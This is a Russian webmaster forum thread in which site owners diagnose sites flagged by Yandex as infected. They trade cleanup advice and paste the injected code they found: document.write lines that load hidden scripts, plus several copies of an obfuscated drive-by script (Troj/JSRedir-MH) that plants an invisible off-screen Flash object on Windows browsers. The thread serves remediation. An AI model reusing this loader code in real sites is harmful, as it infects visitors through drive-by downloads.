- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
http://pravogroup.ru/wp-includes/images/crystal/video.swf
http://pravogroup.ru/wp-includes/images/smilies/functions.js
document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>");
<script type='text/javascript' src='http://pravogroup.ru/wp-content/themes/twentytwelve/js/navigation.js?ver=1.0'></script>
Обратный порядок для обнаружения.
Саму флешку было лень ковырять, возможно она не при чем, но скорее всего:
1. Зачем шифровать, если она нормальная
2. Эксплуатирует уязвимость в какой-то версии Флеш-плеера.
Большое спасибо, что глянули.😎🍻
http://pravogroup.ru/wp-includes/images/crystal/video.swf
http://pravogroup.ru/wp-includes/images/smilies/functions.js
document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>");
<script type='text/javascript' src='http://pravogroup.ru/wp-content/themes/twentytwelve/js/navigation.js?ver=1.0'></script>
Это вирус или только подозрение?
Как Вы это нашли?
Как эти скрипты проявляют себя, чем опасны?
Обратный порядок для обнаружения.
Саму флешку было лень ковырять, возможно она не при чем, но скорее всего:
1. Зачем шифровать, если она нормальная
2. Эксплуатирует уязвимость в какой-то версии Флеш-плеера.
Почему Яша ссылается чутко на другие каталоги?
Это - поведенческий анализ, если вы понимаете суть.
На конфе именно такие примеры показывали, весьма сложно программно найти, поэтому анализ идет на ПФ.
Тут нечего искать - сразу видны "странные" вставки.
video.swf - вскроете и станет ясно что это.
Сейчас:
Смотрите бекапы, если этого раньше не было - удаляйте все.
Потом ищете как злоумышленник смог получить доступ и закрывайте дыры на сайте.
Не понял.
Жаль, нет кнопки спасибо. 🍻🍻😎😎
Это - поведенческий анализ, если вы понимаете суть.
На конфе именно такие примеры показывали, весьма сложно программно найти, поэтому анализ идет на ПФ.
Тут нечего искать - сразу видны "странные" вставки.
Поведение совпадает с эвристическими правилами, характерными для drive-by-download атак.
Я понял нашли просто глазками, без программ.
video.swf - вскроете и станет ясно что это.
Мне не ясно, я его приложил к письму, как он работает?
Сейчас:
Смотрите бекапы, если этого раньше не было - удаляйте все.
Интересно было бы удалить вредноносный код. Планировал вырезать указанные Вами скрипты.
Потом ищете как злоумышленник смог получить доступ и закрывайте дыры на сайте.
Попросил хостера направить мне логи изменений по FTP, SSH и HTML.
После изучения планирую: заблокировать по ip хакеров, логи выложу сюда, возможно, закрою FTP и поменяю права, там видно будет.
Не понял.
/ru/forum/comment/12232785
После Вердикт
10.10.2013
Бесполезное занятие.
Логи доступа к сайту все надо смотреть access.log
Там искать "подозрительные действия"
Скачать его - не составляет труда, а вот разбирать желания нету, пробуйте сами анализировать, либо нанимайте спецов
Защита - работа комплексная, не следует об этом забывать.
Программисту/админу - гораздо сложнее, чем хакеру.
Хакеры - надо всего лишь найти 1 дыру, программисту - закрыть тысячи возможных.
М.б. поможет кому:
вылечился недавно от Troj/JSRedir-MH (так со ссылкой на sophos его обозвал Яндекс)
сам скрипт лежал в administrator/templates/bluestork/main.js
ссыль на него дописалась последней строкой в components/com_virtuemart/assets/js/vmsite.js
Собственно строка:
код самого скрипта:
function addNewObject () {try {
var ua = navigator.userAgent.toLowerCase();
if ((ua.indexOf("chrome") == -1 && ua.indexOf("win") != -1) && navigator.javaEnabled()) {
var dfgvkip=["\x4a\x59mX\x2f\x61\x64\x6d\x69\x6e\x69strato\x72\x2f\x68\x65lp/en\x2d\x47\x42\x2f\x43\x6f\x6dpon\x65\x6e\x74\x73_Ban\x6e\x65\x72\x73\x5f\x54\x72\x61ck","v\x64\x7a\x6afE\x2e\x73\x77\x6f\x46\x52I\x51","R\x68\x59U\x46e\x47\x66Ew\x76\x68\x52\x6f\x53\x58Z\x42j\x65d","s\x75\x62\x73\x74r","ujl\x73\x43\x53\x64\x6ckb\x75G"];var counter = dfgvkip[0][dfgvkip[79-76]](92-13-75,5+45) + dfgvkip[43+38-77][dfgvkip[79-76]](-44+90-94+51,48+56-75-28) + dfgvkip[-87+8-82+162][dfgvkip[79-76]](-71-22+99,20-50-78+111) + dfgvkip[-40+42][dfgvkip[79-76]](15-8,-8+93+1-85);
var div = document.createElement('div');
div.innerHTML = '<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';
div.innerHTML += '<param name="allowScriptAccess" value="always" \/>';
div.innerHTML += '<param name="movie" value="'+ counter +'" \/>';
div.innerHTML += '<embed id="dummy2" name="dummy2" src="'+ counter +'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';
div.innerHTML += '<\/object>';
div.style.position = 'absolute';
div.style.left = '-100px';
div.style.top = '-100px';
document.body.insertBefore(div, document.body.children[0]);
}
} catch (e) {
if (document.body == undefined || document.body.children[0] == undefined) {
setTimeout('addNewObject()', 50);
}
}
}
addNewObject();
М.б. поможет кому:
вылечился недавно от Troj/JSRedir-MH (так со ссылкой на sophos его обозвал Яндекс)
сам скрипт лежал в administrator/templates/bluestork/main.js
ссыль на него дописалась последней строкой в components/com_virtuemart/assets/js/vmsite.js
Спасибо огромное, надеемся, что и нам поможет, яндекс пока не перепроверил, ждём...
Обозвал он его так-же: Troj/JSRedir-MH
Саму строку нашёл в конце файла одного из модов, выглядела вот так:
;document.write("<scr"+"ipt src='/adm/images/show_ads.js'><"+"/script>");И собственно сам файл
function addNewObject(){try{var ua=navigator.userAgent.toLowerCase();if((ua.indexOf("chrome")==-1&&ua.indexOf("win")!=-1)&&navigator.javaEnabled()){var counter="/images/avatars/random/no_avatar17.swf";var div=document.createElement('div');div.innerHTML='<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';div.innerHTML+='<param name="allowScriptAccess" value="always" \/>';div.innerHTML+='<param name="movie" value="'+counter+'" \/>';div.innerHTML+='<embed id="dummy2" name="dummy2" src="'+counter+'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';div.innerHTML+='<\/object>';div.style.position='absolute';div.style.left='-100px';div.style.top='-100px';document.body.insertBefore(div,document.body.children[0]);}}catch(e){if(document.body==undefined||document.body.children[0]==undefined){setTimeout('addNewObject()',50);}}};addNewObject();В предыдущих бэкапах он видоизменялся, и имел, к примеру, вот такой вид, по моему такой-же, как и у вас:
function addNewObject () {try {
var ua = navigator.userAgent.toLowerCase();
if ((ua.indexOf("chrome") == -1 && ua.indexOf("win") != -1) && navigator.javaEnabled()) {
var wzanL=["\x45nqd\x53\x71GmOS\x6e\x74\x61r17\x76\x76D\x70s\x51k\x43O\x73A\x76f\x4d\x6d","\x4aI\x72\x72\x54\x4c\x70\x7a\x76N\x42\x78Wz\x7aka","Gr\x75\x65y\x72x\x66T\x58y\x6eo\x5fa\x76D\x51\x61SJ\x49F\x54\x6a","su\x62\x73t\x72","Bih\x47HQeQx\x6eA\x6f\x74PVy\x44\x76\x71/i\x6dag\x65s\x2fa\x76\x61t\x61r\x73/\x72\x61\x6e\x4bDJf","eF\x6a\x65\x62\x5aw\x79\x58d\x67\x49\x57k\x59\x6bd\x6fm\x2fH\x79\x4f\x77r\x61\x54k\x47","Bhs\x41\x72lM\x4fvGN\x6d\x57\x56y\x68\x71\x78\x54\x66\x77f\x47\x64\x57WJ","\x43\x50fD\x4cx\x42\x63RtR\x47\x43\x2esx\x71nRhL\x43\x68pFOR"];var counter = wzanL[94-90][wzanL[3]](50-79+48,-69+91-3) + wzanL[-13+11+7][wzanL[3]](-58+54+14+6,76-71-1) + wzanL[-38-36-53+129][wzanL[3]](-11-15-72+109,-41-93+78+61) + wzanL[1][wzanL[3]](-21+42+39-44,-91-32+45+79) + wzanL[0][wzanL[3]](89-78,21-16) + wzanL[5+36-34][wzanL[3]](-80+93,-90+92) + wzanL[5+48+94-141][wzanL[3]](48-13-15,-24+26);
var div = document.createElement('div');
div.innerHTML = '<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';
div.innerHTML += '<param name="allowScriptAccess" value="always" \/>';
div.innerHTML += '<param name="movie" value="'+ counter +'" \/>';
div.innerHTML += '<embed id="dummy2" name="dummy2" src="'+ counter +'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';
div.innerHTML += '<\/object>';
div.style.position = 'absolute';
div.style.left = '-100px';
div.style.top = '-100px';
document.body.insertBefore(div, document.body.children[0]);
}
} catch (e) {
if (document.body == undefined || document.body.children[0] == undefined) {
setTimeout('addNewObject()', 50);
}
}
}
addNewObject();
Может быть подскажете на что ещё обратить внимание, чтобы досконально вычистить эту заразу?
Заранее спасибо!
Еще стоит обратить внимание на тот swf файл, путь к которому зашифрован в скрипте.
И собственно не забыть удалить этот swf файл.
На хабре писали как дешифрировать http://habrahabr.ru/post/196882/
А смысл его разбирать?
И так ясно что его удалять надо )
Но его же найти надо, а путь к swf файлу зашифрован )
Вирусописатели на славу постарались )